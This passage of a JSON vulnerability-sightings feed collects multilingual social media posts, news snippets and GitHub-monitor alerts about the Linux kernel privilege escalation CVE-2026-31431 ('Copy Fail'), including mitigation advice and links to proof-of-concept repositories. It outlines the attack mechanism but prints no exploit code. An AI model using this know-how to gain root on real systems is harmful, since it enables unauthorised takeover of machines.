"2026-05-04T17:32:11.752508Z"}, {"uuid": "c558d3b2-1439-4c8a-ad59-ab2a9999ef4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ronan.mastodon.ronandev.ovh.ap.brid.gy/post/3ml277i4zi3m2", "content": "\"CopyFail\" (CVE-2026-31431) : un utilisateur local sans privil\u00e8ge peut \u00e9crire 4 bytes contr\u00f4l\u00e9s dans le cache de TOUT fichier lisible \u27a1\ufe0f \u00e9l\u00e9vation root.\n\nSi vous avez du multi-tenant, des conteneurs, des CI runners non fiables \u27a1\ufe0f mettre \u00e0 jour.\n\nOrdinateur perso \u27a1\ufe0f moins urgent mais mettez \u00e0 [\u2026]", "creation_timestamp": "2026-05-04T17:32:15.820758Z"}, {"uuid": "ba7d3283-c817-4087-946b-b5d3f7deb77b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hexonbot.bsky.social/post/3ml27cjm5l52p", "content": "AI found a 9-year Linux kernel bug in 1 hour. Copy Fail gives any local user root with a 732-byte Python script and can break container isolation. Patch now. https://www.hexon.bot/blog/copy-fail-cve-2026-31431-ai-discovered-linux-root #LinuxSecurity #AISecurity", "creation_timestamp": "2026-05-04T17:32:36.316016Z"}, {"uuid": "94ff514c-c208-48d2-82fb-db2bac5b1421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml27qwgm6qt2", "content": "\"Copy Fail\" Lands on CISA's KEV: A Nine-Year-Old Linux Bug Becomes a Patch Deadline On May 1, 2026, CISA added CVE-2026-31431, better known as \"Copy Fail,\" to its Known Exploite...\n\n#News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-04T17:40:52.930455Z"}, {"uuid": "2c4951da-595d-4029-a3cd-072c0a22736d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/vritrasecnews.bsky.social/post/3ml2a6l4v5w27", "content": "CISA warns of the actively exploited \u201cCopy Fail\u201d Linux flaw (CVE-2026-31431), enabling root...\n\n\ud83d\udd17 https://www.tomshardware.com/software/linux/cisa-flags-actively-exploited-copy-fail-linux-kernel-flaw-enabling-root-takeover-across-major-distros-unpatched-systems-may-remain-vulnerable-to-attack", "creation_timestamp": "2026-05-04T17:48:17.317917Z"}, {"uuid": "cb49147f-b038-43da-859b-c1a90cb6ecdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82790", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a AdityaBhatt3010\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 15:55:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLinux Privilege Escalation | AF_ALG Crypto Abuse \u2192 Exploiting AEAD socket handling (CVE-2026-31431) to gain root via kernel-level manipulation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T16:00:05.000000Z"}, {"uuid": "60aa4e92-1d9e-431e-af4d-e0f11964d70e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82795", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a rippsec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 16:59:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nc v e\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T17:00:04.000000Z"}, {"uuid": "8d716eb6-f302-4140-877b-5f681e995106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mm-ilsoftware-bot.bsky.social/post/3ml2auoi22u2p", "content": "CVE-2026-31431: perch\u00e9 Linux Copy Fail preoccupa\nUna vulnerabilit\u00e0 nel kernel Linux, presente dal 2017, consente escalation a root manipolando la page cache. CISA e altri sogge...\nhttps://www.ilsoftware.it/vulnerabilita-linux-copy-fail-cve-2026-31431/", "creation_timestamp": "2026-05-04T18:00:39.649211Z"}, {"uuid": "1c454b11-5a33-4025-adf8-fdb4fb7912cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "Cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mineabot.xyz/post/3ml2oat3m3g25", "content": "Cve-2026-31431, dubbed Copy Fail, is drawing attention from the selfhosted community. Worth a closer look for teams relying on clipboard-based workflows or any tooling where copy operations cross trust boundaries. Patch management discipline matters here.\n\n#devops #cloud #k8s", "creation_timestamp": "2026-05-04T22:00:05.730271Z"}, {"uuid": "6d88a1e2-6328-4766-98ca-3711e572fad3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jcastanedacano.bsky.social/post/3ml2oc5iwhx2t", "content": "CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments", "creation_timestamp": "2026-05-04T22:00:49.674428Z"}, {"uuid": "126054d7-adab-4769-a87d-2400490e2a49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linuxbp.bsky.social/post/3ml2pb4a44c2j", "content": "Vulnerabilidad cr\u00edtica en Linux \ud83d\udea8 Copy Fail (CVE-2026-31431) permite escalar a root desde un usuario sin privilegios. Silenciosa, potente y presente desde 2017. Actualizar el kernel es clave para protegerte. #Linux #Ciberseguridad #Kernel Mas info en mi blog", "creation_timestamp": "2026-05-04T22:18:08.903462Z"}, {"uuid": "03c7ed3f-4d7e-4943-a9b5-3440f1e8098b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/d40a1dc8ac4ee266441c61907c67812d", "content": "", "creation_timestamp": "2026-05-04T22:32:09.000000Z"}, {"uuid": "38faa0b7-3794-4921-b183-d809f8618ea8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82814", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a KhaosFarbauti\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 21:54:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC for CVE-2026-31431 (Copy Fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T22:00:04.000000Z"}, {"uuid": "9d73794b-aff0-4fc6-a234-69c65240594b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3ml2rmqclgb2t", "content": "Active exploitation targets include cPanel flaw CVE-2026-41940 allowing authentication bypass, Linux Copy Fail CVE-2026-31431, and ongoing supply-chain attacks by TeamPCP impacting CI/CD and SaaS environments. #LinuxKernel #SupplyChain #USA", "creation_timestamp": "2026-05-04T23:00:27.076966Z"}, {"uuid": "d5b406fd-020f-4a43-a078-fb4c6c5d4dfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://threatintel.cc/2026/05/03/cisa-adds-actively-exploited-linux.html", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-31431, a Linux root access bug also known as Copy Fail, to its Known Exploited Vulnerabilities catalog due to active exploitation. This privilege escalation flaw allows unprivileged local users to gain root access by corrupting the kernel’s page cache, posing a significant risk to cloud and containerized environments.", "creation_timestamp": "2026-05-03T20:57:51.000000Z"}, {"uuid": "9442d0ee-1a92-48a4-b777-bdf3b0b0c44f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hatena-bookmark.bsky.social/post/3mkyiolu2t72y", "content": "#\ud83d\udd16\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\nWSL2+Docker\u74b0\u5883\u306b\u304a\u3051\u308b\u3001CVE-2026-31431 (Copy Fail) \u3078\u306e\u5bfe\u7b56\u30e1\u30e2\n\nTL;DR \u7d50\u8ad6\u304b\u3089\u8a00\u3046\u3068\u3001\u300cDocker\u3092v29.4.2\u4ee5\u964d\u3078\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\uff08\u6052\u4e45\u7684\uff09\u300d\u3068\u300c.wslconfig\u306b\u3088\u308balgif_aead\u306e\u7121\u52b9\u5316\uff08\u66ab\u5b9a\u7684\uff09\u300d\u306e2\u6bb5\u69cb\u3048\u304c\u73fe\u72b6\u306e\u6700\u9069\u89e3\u3067\u3059\u3002 \u306f\u3058\u3081\u306b Linux\u30ab\u30fc\u30cd\u30eb\u306e\u6a29\u9650\u6607\u683c\u8106\u5f31\u6027\u300cCopy Fail\uff08CVE-2026-31431\uff09\u300d\u304c\u3001GW\u771f\u3063\u53ea\u4e2d\u306e\u4e16\u9593\u3092\u9a12\u304c\u305b\u3066\u3044\u307e\u3059\u3002 \u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u5bb9\u6613\u306broo\nhttps://zenn.dev/user_thebigslee/articles/41b570658f911b", "creation_timestamp": "2026-05-04T01:15:06.452468Z"}, {"uuid": "ae7b2bc8-a67f-41bb-a297-7551335973b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkyklgfls62x", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T01:49:06.736872Z"}, {"uuid": "3fbc1200-d904-4bb8-bf23-99ed68d8282a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/aimainainnu.bsky.social/post/3mkynce7sok2d", "content": "\u300cCopy Fail\u300dLinux \u30d0\u30b0\uff1a732\u30d0\u30a4\u30c8\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u30672017\u5e74\u4ee5\u964d\u306e\u307b\u307c\u3059\u3079\u3066\u306e\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u3066 root \u6a29\u9650\u306e\u53d6\u5f97\u304c\u53ef\u80fd\u306b - BigGo \u30cb\u30e5\u30fc\u30b9 \n\nLinux \u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308b\u300cCopy Fail\u300d\u3068\u547d\u540d\u3055\u308c\u305f CVE-2026-31431 \u3068\u3044\u3046\u6df1\u523b\u306a\u8ad6\u7406\u30d9\u30fc\u30b9\u306e\u8106\u5f31\u6027\u306f\u3001\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u304a\u3088\u3073\u30af\u30e9\u30a6\u30c9\u30b3\u30f3\u30d4\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0\u306e ... \nbiggo.jp/news/2026050...", "creation_timestamp": "2026-05-04T02:37:48.394653Z"}, {"uuid": "c172485e-8af2-403d-8346-03fbbef94f36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/XXwxQXb-tvoojVYSOrs5t4rzcGDASvn2l14g7pH1kZVhQSE", "content": "", "creation_timestamp": "2026-05-03T21:00:04.000000Z"}, {"uuid": "2e295ddc-ffb5-40cf-9391-cc3ba430afd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2d2d3idz2x", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T18:39:35.987754Z"}, {"uuid": "53afef64-42d4-4998-afe9-7930b3bcdd9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2e4w4vwn22", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T18:58:56.973169Z"}, {"uuid": "b28347b4-7e44-42c9-9e8a-4bbc5d35c431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sebclick.bsky.social/post/3ml2e7lqlqc2z", "content": "Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux www.linuxtricks.fr/news/10-logi...", "creation_timestamp": "2026-05-04T19:00:30.193234Z"}, {"uuid": "38b840b2-9cb5-42c7-872a-94f42c5ae298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml2gfw3csci2", "content": "CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments A high-severity Linux vulnerability, \u201cCopy Fail\u201d (CVE-2026-31431), enables root privile...\n\n#Linux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-04T19:39:49.302500Z"}, {"uuid": "ef150ce2-e667-4c8e-b705-9196bd158c8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Sagreras/8b433fc36ef0b27726c0ff435a8a5638", "content": "", "creation_timestamp": "2026-05-04T20:11:04.000000Z"}, {"uuid": "44a1b56e-b23f-4660-a722-6b42d6f48f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dietpi.com/post/3ml2j33d3wc2r", "content": "We gathered all info about how to mitigate the recently disclosed CVE-2026-31431 aka \"Copy Fail\" on #DietPi systems.\n\nPlease read through this, to assure your system is not vulnerable: github.com/MichaIng/Die...\n\nThe same applies to every other Linux system!\n\n#CopyFail #Security #Linux", "creation_timestamp": "2026-05-04T20:27:24.885816Z"}, {"uuid": "458a157b-9282-4ea8-b038-8a1606b108f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dietpi.com/post/3ml2j6tyr6222", "content": "We gathered all info about how to mitigate the recently disclosed CVE-2026-31431 aka \"Copy Fail\" on #DietPi systems.\n\nPlease read through this, to assure your system is not vulnerable: github.com/MichaIng/Die...\n\nThe same applies to every other Linux system!\n\n#CopyFail #Security #Linux", "creation_timestamp": "2026-05-04T20:29:30.832424Z"}, {"uuid": "645888fa-5c6b-48f8-a3a4-303361423f4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/humanghostemoji.bsky.social/post/3ml2sg3y6vy23", "content": "US warns CopyFail bug (CVE-2026-31431) hits Linux 7.0 & earlier, exploited in the wild. Patch by May 15. #Linux #security\ntechcrunch.com/2026/05/04/u...", "creation_timestamp": "2026-05-04T23:14:37.784190Z"}, {"uuid": "a157e6ba-5489-4a09-90aa-27b2bf8362e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2swnj7rl2x", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T23:23:52.853138Z"}, {"uuid": "b92aa46a-d94b-4a4b-bf20-dbac08b9029d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82820", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a check-copyfail-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Silent4Labs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 22:50:45\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only Linux Bash script to assess host exposure to CVE-2026-31431 (Copy Fail).\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T23:00:05.000000Z"}, {"uuid": "feb3f3ce-0015-4fb4-b23f-74f8c2678219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/P5bUU6aFVi3_TImC6WDx24HeHf8RVUggO7fw0-2Q4WCtYm0", "content": "", "creation_timestamp": "2026-04-30T07:00:11.000000Z"}, {"uuid": "b25d054d-212c-4401-b79f-e5aef0e38dda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3ml3x4xy32p2v", "content": "A vulnerability (CVE-2026-31431) allowed privilege escalation within a rootless container by corrupting the page cache of /usr/bin/su. However, User Namespace UID mapping prevented the escalation from affecting the host system, demonstrating the effectiveness of rootless container architecture.", "creation_timestamp": "2026-05-05T10:11:39.587750Z"}, {"uuid": "7b233e77-1920-4aab-a087-a187e4f75080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rankednews.bsky.social/post/3ml2v4ownap23", "content": "U.S. government warns of severe CopyFail bug affecting major versions of Linux: The U.S. government has issued an urgent warning regarding \"CopyFail,\" a severe security vulnerability tracked as CVE-2026-31431 affecting Linux kernel versions 7.0 and earlier. Discovered\u2026 https://ranked.news/763195?u=b", "creation_timestamp": "2026-05-05T00:03:03.956033Z"}, {"uuid": "83a33e6b-9adb-4bdb-a74b-ba62bc2d0163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gagadgetespana.bsky.social/post/3ml2zbestff2c", "content": "La vulnerabilidad CVE-2026-31431 afecta a la mayor\u00eda de distribuciones Linux modernas y ya est\u00e1 siendo explotada activamente. CERT-EU exige actuaciones inmediatas en operadores y administraciones.", "creation_timestamp": "2026-05-05T01:17:15.599393Z"}, {"uuid": "e7656cfb-a0b6-49eb-8610-4a7b2732e48e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gagadgetde.bsky.social/post/3ml2zbky4qb2v", "content": "CVE-2026-31431 betrifft nahezu alle g\u00e4ngigen Linux-Distributionen seit 2017 \u2013 Patches sind verf\u00fcgbar, aber noch nicht \u00fcberall eingespielt.", "creation_timestamp": "2026-05-05T01:17:22.844627Z"}, {"uuid": "1d728967-1f30-4a74-b10e-5344cfa6b31d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gagadgetfr.bsky.social/post/3ml2zcadfnt2f", "content": "La vuln\u00e9rabilit\u00e9 CVE-2026-31431, activement exploit\u00e9e depuis fin avril, touche Ubuntu, RHEL, Amazon Linux et les environnements Kubernetes. Les op\u00e9rateurs cloud et h\u00e9bergeurs fran\u00e7ais doivent agir sans d\u00e9lai.", "creation_timestamp": "2026-05-05T01:17:44.422371Z"}, {"uuid": "555482ca-a451-4862-bf78-eee25510272e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3ml2zokdr2d2j", "content": "Critical Linux Kernel \u201cCopy Fail\u201d Flaw Sparks Global Root Access Panic Across Major\u00a0Distros\n\nIntroduction: A Silent Kernel-Level Weakness With Explosive Consequences A newly identified Linux kernel vulnerability, tracked as CVE-2026-31431 and nicknamed \u201cCopy Fail,\u201d has triggered serious concern\u2026", "creation_timestamp": "2026-05-05T01:24:38.141087Z"}, {"uuid": "0580e394-2dbb-4995-aec7-06e2515d1ab5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/novalfaiq/e6afa58d88747d77a302b80aa86088b2", "content": "", "creation_timestamp": "2026-05-05T01:23:45.000000Z"}, {"uuid": "3a5f4047-24a8-47b7-90fa-847224e4428e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/novalfaiq/9d01ab62f9c504321c5bebaf90d2fcab", "content": "", "creation_timestamp": "2026-05-05T01:46:52.000000Z"}, {"uuid": "283cedf4-198e-4e8f-b87a-08125c7856d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82837", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a rippsec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 00:47:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T01:00:04.000000Z"}, {"uuid": "44e30d85-1018-453a-9ca5-e9d602e7fa97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3ml34u76hg72r", "content": "The latest update for #SafeBreach includes \"'Copy Fail' Vulnerability (CVE-2026-31431): #Linux Kernel Privilege Escalation\" and \"Introducing SafeBreach Helm\".\n \n#Cybersecurity https://opsmtrs.com/41NWGuQ", "creation_timestamp": "2026-05-05T02:21:27.957005Z"}, {"uuid": "1e9dd049-9ebc-4dee-8c03-3bc26d84ac72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3ml35daxrws2s", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 540 interactions\nCVE-2026-41940: 82 interactions\nCVE-2026-3854: 57 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 59 interactions\nCVE-2026-41940: 8 interactions\nCVE-2026-22679: 5 interactions\n", "creation_timestamp": "2026-05-05T02:29:52.980545Z"}, {"uuid": "fd0d860b-8e04-430b-b833-67155eb0986a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/byroniac.bsky.social/post/3ml2mulryyc2q", "content": "\"CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments\" www.microsoft.com/en-us/securi...", "creation_timestamp": "2026-05-04T21:35:23.455106Z"}, {"uuid": "ffec2d95-fb83-4121-a6a0-ba183394cf5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 